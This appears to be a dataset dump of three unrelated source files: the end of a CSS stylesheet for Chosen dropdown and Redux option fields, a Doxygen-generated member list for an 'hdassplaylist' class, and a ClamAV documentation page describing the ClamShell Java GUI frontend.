background-image: -o-linear-gradient(top, #3875d7 20%, #2a62bc 90%);
background-image: linear-gradient(#3875d7 20%, #2a62bc 90%);
color: #fff;
}
.chzn-container .chzn-results li em {
background: #feffde;
font-style: normal;
}
.chzn-container .chzn-results .highlighted em {
background: transparent;
}
.chzn-container .chzn-results .no-results {
background: #f4f4f4;
display: list-item;
}
.chzn-container .chzn-results .group-result {
cursor: default;
color: #999;
font-weight: bold;
}
.chzn-container .chzn-results .group-option {
padding-left: 15px;
}
.chzn-container-multi .chzn-drop .result-selected {
display: none;
}
.chzn-container .chzn-results-scroll {
background: white;
margin: 0 4px;
position: absolute;
text-align: center;
width: 321px; /* This should by dynamic with js */
z-index: 1;
}
.chzn-container .chzn-results-scroll span {
display: inline-block;
height: 17px;
text-indent: -5000px;
width: 9px;
}
.chzn-container .chzn-results-scroll-down {
bottom: 0;
}
.chzn-container .chzn-results-scroll-down span {
}
.chzn-container .chzn-results-scroll-up span {
}
/* @end */
/* @group Active */
.chzn-container-active .chzn-single {
-webkit-box-shadow: 0 0 5px rgba(0,0,0,.3);
-moz-box-shadow : 0 0 5px rgba(0,0,0,.3);
box-shadow : 0 0 5px rgba(0,0,0,.3);
border: 1px solid #5897fb;
}
.chzn-container-active .chzn-single-with-drop {
border: 1px solid #aaa;
-webkit-box-shadow: 0 1px 0 #fff inset;
-moz-box-shadow : 0 1px 0 #fff inset;
box-shadow : 0 1px 0 #fff inset;
background-color: #eee;
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#eeeeee', endColorstr='#ffffff', GradientType=0 );
background-image: -webkit-gradient(linear, 0 0, 0 100%, color-stop(20%, #eeeeee), color-stop(80%, #ffffff));
background-image: -webkit-linear-gradient(top, #eeeeee 20%, #ffffff 80%);
background-image: -moz-linear-gradient(top, #eeeeee 20%, #ffffff 80%);
background-image: -o-linear-gradient(top, #eeeeee 20%, #ffffff 80%);
background-image: linear-gradient(#eeeeee 20%, #ffffff 80%);
-webkit-border-bottom-left-radius : 0;
-webkit-border-bottom-right-radius: 0;
-moz-border-radius-bottomleft : 0;
-moz-border-radius-bottomright: 0;
border-bottom-left-radius : 0;
border-bottom-right-radius: 0;
}
.chzn-container-active .chzn-single-with-drop div {
background: transparent;
border-left: none;
}
.chzn-container-active .chzn-single-with-drop div b {
background-position: -18px 2px;
}
.chzn-container-active .chzn-choices {
-webkit-box-shadow: 0 0 5px rgba(0,0,0,.3);
-moz-box-shadow : 0 0 5px rgba(0,0,0,.3);
box-shadow : 0 0 5px rgba(0,0,0,.3);
border: 1px solid #5897fb;
}
.chzn-container-active .chzn-choices .search-field input {
color: #111 !important;
}
/* @end */
/* @group Disabled Support */
.chzn-disabled {
cursor: default;
opacity:0.5 !important;
}
.chzn-disabled .chzn-single {
cursor: default;
}
.chzn-disabled .chzn-choices .search-choice .search-choice-close {
cursor: default;
}
/* @group Right to Left */
.chzn-rtl { text-align: right; }
.chzn-rtl .chzn-single { padding: 0 8px 0 0; overflow: visible; }
.chzn-rtl .chzn-single span { margin-left: 26px; margin-right: 0; direction: rtl; }
.chzn-rtl .chzn-single div { left: 3px; right: auto; }
.chzn-rtl .chzn-single abbr {
left: 26px;
right: auto;
}
.chzn-rtl .chzn-choices .search-field input { direction: rtl; }
.chzn-rtl .chzn-choices li { float: right; }
.chzn-rtl .chzn-choices .search-choice { padding: 3px 5px 3px 19px; margin: 3px 5px 3px 0; }
.chzn-rtl .chzn-choices .search-choice .search-choice-close { left: 4px; right: auto; }
.chzn-rtl.chzn-container-single .chzn-results { margin: 0 0 4px 4px; padding: 0 4px 0 0; }
.chzn-rtl .chzn-results .group-option { padding-left: 0; padding-right: 15px; }
.chzn-rtl.chzn-container-active .chzn-single-with-drop div { border-right: none; }
.chzn-rtl .chzn-search input {
padding: 4px 5px 4px 20px;
direction: rtl;
}
.chzn-container-single.chzn-rtl .chzn-single div b {
background-position: 6px 2px;
}
.chzn-container-single.chzn-rtl .chzn-single-with-drop div b {
background-position: -12px 2px;
}
/*
** text_sortable field
*/
.text_sortable label {
display:inline-block;
width:6.5em;
}
.text_sortable .drag {
width:16px;
height:16px;
display:inline-block;
opacity:0.7;
text-indent:-9999px;
background:url('../img/icn_opt_drag.png') no-repeat top left;
margin:0 0 0 3px;
position:relative;
top:0.5em;
}
.text_sortable .drag:hover {
opacity:1;
}
/*
** slider field
*/
.slider {
width: 300px;
}
.slider > .dragger {
background: #2295c9;
width: 16px;
height: 16px;
}
.slider > .dragger:hover {
background: -webkit-linear-gradient(top, #8DCA09, #8DCA09);
}
.slider > .track {
background: #eeeeee;
height: 6px;
}
.slider_value {
display:inline-block;
min-width:3em;
}
/*
** bg images field
*/
.bg-image-tiles .redux-radio-img, .bg-image-tiles .redux-radio-img-selected {
width: 50px;
height: 50px;
}
.bg-image-tiles .redux-radio-img img, .bg-image-tiles .redux-radio-img-selected img {
height: 43px;
width: 43px;
}
.bg-image-tiles .description {
margin-top: 30px;
display: block;
}
/*
** Google Font Display Changes
*/
#google_standard_font, #google_heading_font {
margin-top: 15px;
margin-bottom: 0;
border-bottom: 0;
font-size: 18px;
}
.font-select {
font-size: 14px;
}
.font-select > a span {
line-height: 28px;
}
.font-select .fs-results li {
font-size: 14px;
}
/*
** Header Config Select
*/
.redux-radio-img-header_layout {
line-height: auto;
}
.redux-radio-img-header_layout > img {
max-width: 100%;
box-sizing: border-box;
}
.ui-buttonset {
position: relative;
}
.ui-helper-hidden-accessible {
left: auto;
top: auto;
}
textarea#custom_css, textarea#custom_js {
min-height: 500px;
} |
html/classhdassplaylist-members.html | chunyisu/hdass | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>HDASS: Member List</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.3.6 -->
<div class="qindex"><a class="qindex" href="main.html">Main Page</a> | <a class="qindex" href="namespaces.html">Namespace List</a> | <a class="qindex" href="hierarchy.html">Class Hierarchy</a> | <a class="qindex" href="classes.html">Alphabetical List</a> | <a class="qindex" href="annotated.html">Class List</a> | <a class="qindex" href="files.html">File List</a> | <a class="qindex" href="namespacemembers.html">Namespace Members</a> | <a class="qindex" href="functions.html">Class Members</a> | <a class="qindex" href="globals.html">File Members</a></div>
<h1>hdassplaylist Member List</h1>This is the complete list of members for <a class="el" href="classhdassplaylist.html">hdassplaylist</a>, including all inherited members.<table>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylistd4">AppendList</a>(KURL::List)</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td><code> [private]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylistd1">CutList</a>(KURL::List)</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td><code> [private]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylista0">hdassplaylist</a>(QObject *parent=0, const char *name=0)</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylisto0">List</a></td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylistd2">PasteList</a>()</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td><code> [private]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylista3">ReadListFile</a>(QString FileName)</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylistd0">RemoveList</a>(KURL::List)</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td><code> [private]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylistd3">SaveList</a>()</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td><code> [private]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylistl0">signalPLSend</a>(KURL::List)</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td><code> [signal]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylisti0">slotPLRequest</a>()</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td><code> [slot]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylisti1">slotReciveList</a>(KURL::List list, HDASS_ACTION_TYPE act)</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td><code> [slot]</code></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylisto1">url_list</a></td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylisto2">url_list_cut_buffer</a></td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylista2">xSetup</a>()</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="classhdassplaylist.html#hdassplaylista1">~hdassplaylist</a>()</td><td><a class="el" href="classhdassplaylist.html">hdassplaylist</a></td><td></td></tr>
</table><hr size="1"><address style="align: right;"><small>Generated on Fri May 13 17:07:27 2005 for HDASS by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border=0 >
</a>1.3.6 </small></address>
</body>
</html>
|
user/clamav/docs/html/node125.html | scs/uclinux | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<!--Converted with LaTeX2HTML 99.2beta8 (1.46)
original version by: Nikos Drakos, CBLU, University of Leeds
* revised and updated by: Marcus Hennecke, Ross Moore, Herb Swan
* with significant contributions from:
Jens Lippmann, Marek Rouchal, Martin Wilck and others -->
<HTML>
<HEAD>
<TITLE>ClamShell</TITLE>
<META NAME="description" CONTENT="ClamShell">
<META NAME="keywords" CONTENT="clamdoc">
<META NAME="resource-type" CONTENT="document">
<META NAME="distribution" CONTENT="global">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="LaTeX2HTML v99.2beta8">
<META HTTP-EQUIV="Content-Style-Type" CONTENT="text/css">
<LINK REL="STYLESHEET" HREF="clamdoc.css">
<LINK REL="next" HREF="node126.html">
<LINK REL="previous" HREF="node124.html">
<LINK REL="up" HREF="node121.html">
<LINK REL="next" HREF="node126.html">
</HEAD>
<BODY >
<!--Navigation Panel-->
<A NAME="tex2html2290"
HREF="node126.html">
<IMG WIDTH="37" HEIGHT="24" ALIGN="BOTTOM" BORDER="0" ALT="next" SRC="next.png"></A>
<A NAME="tex2html2286"
HREF="node121.html">
<IMG WIDTH="26" HEIGHT="24" ALIGN="BOTTOM" BORDER="0" ALT="up" SRC="up.png"></A>
<A NAME="tex2html2280"
HREF="node124.html">
<IMG WIDTH="63" HEIGHT="24" ALIGN="BOTTOM" BORDER="0" ALT="previous" SRC="prev.png"></A>
<A NAME="tex2html2288"
HREF="node1.html">
<IMG WIDTH="65" HEIGHT="24" ALIGN="BOTTOM" BORDER="0" ALT="contents" SRC="contents.png"></A>
<BR>
<B> Next:</B> <A NAME="tex2html2291"
HREF="node126.html">ClamTk</A>
<B> Up:</B> <A NAME="tex2html2287"
HREF="node121.html">Graphical User Interface +</A>
<B> Previous:</B> <A NAME="tex2html2281"
HREF="node124.html">Clamaktion</A>
  <B> <A NAME="tex2html2289"
HREF="node1.html">Contents</A></B>
<BR>
<BR>
<!--End of Navigation Panel-->
<H3><A NAME="SECTION00096400000000000000">
ClamShell</A>
</H3>
<B>Homepage:</B> <TT><A NAME="tex2html122"
HREF="http://home.comcast.net/~schwalbrichard/">http://home.comcast.net/~schwalbrichard/</A></TT>
<BR> <B>Supports:</B> clamscan
<BR>
ClamShell is a GUI frontend, written in Java, for the Linux version of
ClamAV.
<P>
<BR><HR>
<ADDRESS>
Tomasz Kojm
2006-10-15
</ADDRESS>
</BODY>
</HTML>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.